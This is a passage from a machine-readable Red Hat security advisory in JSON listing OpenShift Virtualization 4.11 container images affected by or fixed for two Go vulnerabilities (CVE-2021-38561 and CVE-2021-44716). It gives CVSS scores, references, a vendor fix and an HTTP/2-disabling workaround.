"8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64",
"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64",
"8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64",
"8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64",
"8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-38561"
},
{
"category": "external",
"summary": "RHBZ#2100495",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2100495"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-38561",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-38561"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2021-0113",
"url": "https://pkg.go.dev/vuln/GO-2021-0113"
}
],
"release_date": "2021-08-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-09-14T19:28:51+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:6526"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: out-of-bounds read in golang.org/x/text/language leads to DoS"
},
{
"cve": "CVE-2021-44716",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2021-12-09T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64",
"8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64",
"8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64",
"8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2030801"
}
],
"notes": [
{
"category": "description",
"text": "There\u0027s an uncontrolled resource consumption flaw in golang\u0027s net/http library in the canonicalHeader() function. An attacker who submits specially crafted requests to applications linked with net/http\u0027s http2 functionality could cause excessive resource consumption that could lead to a denial of service or otherwise impact to system performance and resources.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: net/http: limit growth of header canonicalization cache",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "For OpenShift Container Platform, OpenShift Virtualization, Red Hat Quay and OpenShift distributed tracing the most an attacker can possibly achieve by exploiting this vulnerability is to crash a container, temporarily impacting availability of one or more services. Therefore impact is rated Moderate.\n\nIn its default configuration, grafana as shipped in Red Hat Enterprise Linux 8 is not affected by this vulnerability. However, enabling http2 in /etc/grafana/grafana.ini explicitly would render grafana affected, therefore grafana has been marked affected.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64"
],
"known_not_affected": [
"8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64",
"8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64",
"8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64",
"8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-44716"
},
{
"category": "external",
"summary": "RHBZ#2030801",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030801"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-44716",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44716"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k",
"url": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k"
}
],
"release_date": "2021-12-09T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-09-14T19:28:51+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:6526"
},
{
"category": "workaround",
"details": "This flaw can be mitigated by disabling HTTP/2. Setting the GODEBUG=http2server=0 environment variable before calling Serve will disable HTTP/2 unless it was manually configured through the golang.org/x/net/http2 package.",
"product_ids": [
"8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64",
"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64",
"8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
